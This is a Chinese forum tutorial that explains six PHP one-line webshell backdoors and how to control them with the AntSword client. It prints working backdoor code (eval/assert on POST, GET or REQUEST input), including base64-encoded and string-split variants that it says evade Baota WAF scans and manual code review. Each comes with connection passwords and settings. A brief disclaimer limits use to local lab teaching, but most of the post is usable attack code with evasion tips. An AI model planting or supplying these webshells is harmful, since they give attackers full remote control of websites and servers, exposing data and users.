php木马详解+蚁剑使用方法-技术教程论坛-技术之家-989论坛

php木马详解+蚁剑使用方法

喂喂喂,依旧你们帅气的老叔,最近看到很多毒包,在近期有很多的人都“遭罪”了,然后还对毒包进行加密了,估计用WordPress建站的站长应该深有体会,很多的毒包和木马都隐藏在了插件文件或者主题文件里,或者是伪插件,然后再对你的站点进行偷流,或者做劫持,今天给各位带来了php的几种病毒代码和详解。

photo_2025-08-13_01-52-14

郑重警告:以下所有代码仅用于「宝塔本地虚拟机教学、漏洞原理讲解、安全攻防实验」,严禁上传外网服务器、严禁入侵他人网站/服务器!私自恶意使用触犯《网络安全法》《刑法》,将追究刑事责任,后果自负!

1: 经典 POST 一句话木马

<?php @eval($_POST['pass']); ?>
代码详解
  • @:屏蔽报错信息,隐藏后门痕迹,不暴露漏洞
  • eval():PHP 高危函数,把字符串当成 PHP 代码直接运行
  • $_POST['pass']:接收蚁剑 POST 提交过来的指令,密码pass
蚁剑连接方法
  1. 地址:网站域名 / 文件名.php
  2. 密码:pass
  3. 类型:POST 普通连接,无需编码
  4. 直接测试连接即可成功
植入源码后果

攻击者远程任意执行 PHP 代码,遍历网站所有文件、读取数据库账号密码、篡改首页、删除源码、控制整站服务器。

2: GET 型一句话木马

<?php @eval($_GET['cmd']); ?>
  • $_GET['cmd']:从浏览器网址栏接收参数执行代码
  • 不用 POST 提交,URL 拼接 ?cmd=xxx 就能运行木马
蚁剑连接方法
  1. 地址:网站地址
  2. 密码:cmd
  3. 连接协议选择:GET
  4. 普通无编码连接
植入源码后果

极易被漏洞扫描器批量扫出,黑客不用工具,浏览器直接入侵网站,批量挂黑链、挖矿、泄露用户数据。

3: 万能 REQUEST 一句话(GET/POST 通用)

<?php @eval($_REQUEST['all']); ?>
代码详解
  • $_REQUEST 同时兼容 GET + POST 两种传参方式
  • 不管浏览器访问、工具提交、蚁剑连接都能触发
蚁剑连接方法
  1. 密码:all
  2. 蚁剑默认 POST 即可,不用改任何设置
  3. 兼容性最强,99% 宝塔环境都能用
植入源码后果

攻击方式不限,任何请求都能触发后门,网站全方位沦陷,难以拦截防护。

4: Base64 加密免杀木马(绕过宝塔查杀)

<?php$code = base64_decode($_POST['key']);@eval($code);?>
代码详解
  1. 蚁剑发送 base64 加密后的指令
  2. 服务器解密后再交给 eval 执行
  3. 宝塔 WAF、后门扫描检测不到明文恶意关键词
蚁剑连接方法
  1. 密码:key
  2. 蚁剑编码器选择:base64
  3. POST 正常连接
植入源码后果

后门长期隐藏潜伏,很难被查杀,黑客长期窃取数据、后台权限、服务器 Root 权限。

5: Assert 高危一句话(PHP7 通用老牌后门)

<?php @assert($_POST['shell']); ?>
代码详解
  • assert() 和 eval 功能几乎一模一样,也是执行字符串 PHP 代码
  • 很多老宝塔 PHP 版本默认不禁用 assert,存活率极高
蚁剑连接方法
  1. 密码:shell
  2. 普通 POST 连接,无需编码
  3. 低版本 PHP 稳定性远超 eval
植入源码后果

全站最高权限,读写数据库、修改配置、上传病毒、服务器被远程操控挖矿。

6: 字符串拆分隐蔽木马(绕过源码审计)

<?php$f = 'e'.'v'.'a'.'l';$f(@$_POST['yincang']);?>
代码详解
  • 把 eval 拆开拼接,不是完整关键词
  • 人工肉眼、普通扫描工具都看不出是木马
  • 最终运行效果和 eval 完全一致
蚁剑连接方法
  1. 密码:yincang
  2. 普通 POST 连接
  3. 无需编码
植入源码后果

隐蔽性极强,长期潜伏在网站源码里,管理员很难发现,持续被窃取信息、篡改站点。

蚁剑统一核心原理

蚁剑 = 远程控制面板

木马 = 网站后门

蚁剑发送指令 → 木马接收 → eval 执行代码 → 服务器返回结果= 完全控制你的网站 + 宝塔服务器

蚁剑(AntSword)官方地址

今天先说到这里,等我得空,再教你们一点多的

请登录后发表评论

    没有回复内容